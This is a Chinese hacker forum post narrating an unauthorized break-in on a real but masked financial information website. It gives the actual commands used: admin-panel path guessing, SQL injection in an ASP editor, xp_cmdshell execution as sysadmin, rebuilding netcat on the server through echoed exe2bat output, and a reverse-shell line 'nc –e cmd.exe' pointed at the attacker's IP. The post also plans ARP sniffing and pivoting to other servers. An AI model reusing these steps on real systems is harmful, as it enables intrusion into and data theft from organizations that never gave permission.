|
by 阿呆
站点:www.***.com.cn (地址我屏蔽了)
文章目的:仅做技术交流,无其他用意
起因:纯粹无聊
Go`````
www.***.com.cn是国内一家比较著名的金融信息站点,其站点规模也是十分庞大的!曾被国内CCTV等多家媒体报道,今天无意中路过此站,便无聊想检测一下,不晓得他的安全是否跟他的知名度同样呢```
站点的构造是我见过最变态的一个,脚本由ASP,.net,JSP组成
对站点大概的扫描了下,由于服务器设置了500报错,所以不管任何的POST 都返回200报告,所以想通过扫描挖掘深层敏感目录是没戏了```
开始对脚本进行检测,GOOGLE site:***.com.cn inur:jsp asp aspx 后 都没检测到注射
意料之内,开始对各个副站逐一检查````
因为此次讲得是脚本检测,所以对服务器检测过程略过
在经过漫长的检测后,目标锁定下站点的 读书频道book.***.com.cn 这个频道采用的是ASP脚本 已经彻底检查过了,没有发现上传注射等漏洞````
接着对各各连接一个一个点过去,然后查看GET 数据包``` 很意外的发现了一个比较隐蔽的目录 u_adlogin/upload/ 来源是个图片连接``````一看就知道是个上传模块,一般上传模块都在后台使用的,如果没猜错的话u_adlogin 就是后台目录了````
开始手工猜后台, admin,admin.asp,login.asp,main.asp,member,manage! GOOD manage跳出个后台登陆,试了下弱口令和OR都不行 正常~ 接着提交manage/left.asp manage/top.asp, manage/main.asp manage/admin.asp (很多朋友可能会奇怪,为什么我会提交这些,因为有些站的后台 有分栏设置,而这些分栏文件一般是没有做COOKIE或siession验证的,但是他们的功能只是普通的导航而已)manage/admin.asp 终于跳出个菜单导航来了,有图书管理,图书编辑,图片管理,图片上传,管理员管理等````用迅雷下载全部,发现图书编辑的URL是/HTMLEditor/editput.asp 点进去,很好没有做cookie验证````
随便点了本图书,跳出个文本编辑器,但很意外的是这个编辑器不同于其他编辑器是HTML,它是ASP的HTMLEditor/editbox.asp?id=13755 随手加了个’
Microsoft OLE DB Provider for SQL Server error '80040e14'
字符串 '' 之前有未闭合的引号。
/manage/HTMLEditor/editbox.asp, line 77
天哪,传说中的后台注射让我遇到了,RP真不错呀!!!
丢到NBSI里跑了下,竟然是sysadmin
得到SA后,马上检测扩展储存是否完好
exec master.dbo.xp_cmdshell 'echo adai c:\adai.txt';--
接这列C盘目录,发现adai.txt顺利写入!看来xpcmdshell是可以直接利用了•••
先看下服务器开了哪些服务,net start
发现开了终端,但并没有发现有IIS服务•••难道?马上ipconfig ,果然Web与DATA分离了•••
Netstat –an下发现都是C段连接本机1433的信息,其中包括了主站,和大部分分站的IP。看来这个服务器是不仅是读书频道的数据库服务器,还是整个站点的通过存储数据库了,GOOD!
思路很简单了,拿下DATA服务器后,试着靠DATA服务器上的数据库对主站进行渗透,如果失败就sniffer C段下的所有服务器,因为arp –a 返回的消息证明可以直接sniffer了
既然开了终端,马上mastsc,结果显示连接失败,明明是外网,netstat –an也发现有3389的端口,难道? 马上net start,果然,做了IP策略,并仔细观察了下其他服务,没有发现防火墙,杀软等
从服务器的整体结构来看,估计这个IP策略是做到家了,马上扫描DATA服务器,结果发现只有21端口开放,并且21对应的并不是FTP•••也没有对应其他服务,这是怎么回事?先放着不管
思路:既然服务器做了IP策略,那我就反弹个shell回来,然后吧终端映射到本机,然后创建用户OVER之~~~
先传个NC上去,马上ECHO个VBS上去,cscript执行,结果返回报错c:\d.vbs(4, 3) msxml3.dll: The system cannot locate the resource specified.
Msxml3出错?估计是xmlhttp做了限制,试着重新注册下,然后再次cscript,仍然出错,没戏•••
又试着写了个FTP下载脚本,然后ftp –s:ftp.txt 结果显示time out ..试了几次还是一样!!难道RP出问题了?
NBSI自带的上传就别说了,二进制下文件扩充了一倍!
可能有些朋友会说,不会sp_addlogin个用户,然后用sqltools上传….请注意上面的扫描报告!
顿时陷入僵局,连文件都传不上去就别说反弹shell了….
点根烟,整理思路````
对了,我不是可以ECHO么,可以吧EXE转换成BAT然后ECHO 转换后的代码让他恢复成exe文件,这个exe2bat就可以搞定了••••
于是开始不断的ECHO- - 直到手快麻痹时,终于完成了,dir nc.exe
Volume in drive C has no label.
Volume Serial Number is 30A3-10C5
Directory of C:\WINDOWS\system32
2008-05-08 11:24 28,160 nc.exe
1 File(s) 28,160 bytes
0 Dir(s) 7,018,565,632 bytes free
终于传上去了,马上本地监听69端口,服务器上执行 nc –e cmd.exe xxx.xxx.xxx.xx 69
结果等了半天本机都没反应,服务器上tasklist下,发现NC已经顺利执行了,netstat –an却没有发现 69端口的连接信息。。。难道服务器无网络?
试着ping www.baidu.com
Pinging www.a.shifen.com [220.181.37.55] with 32 bytes of data:
Reply from 220.181.37.55: bytes=32 time=1ms TTL=55
Reply from 220.181.37.55: bytes=32 time=2ms TTL=55
Reply from 220.181.37.55: bytes=32 time=1ms TTL=55
Reply from 220.181.37.55: bytes=32 time=1ms TTL=55
Ping statistics for 220.181.37.55:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 2ms, Average = 1ms
没问题呀,可以上网••••
telnet 本机的 69端,失败••••
联想起刚才的FTP :time out 终端没反应,以及VBS和现在的telnet••••顿时倒吸口冷气,难道服务器是对C段外的所有TCP数据包做了屏蔽?如果是这样,按一般的渗透的思路都将失败- -
但是却可以PING,这么说 对 ICMP数据包没有屏蔽了,思路还是有的,把ICMP包和TCP数据包进行转换,这方法在朋友那听说过,涉及到汇编下对包的拆分再封装,可我偏偏对汇编感冒~~~
看来只能放弃DATA服务器了••••
不过,还没结束,思路是可以逆转的嘛~~~~HOHO |
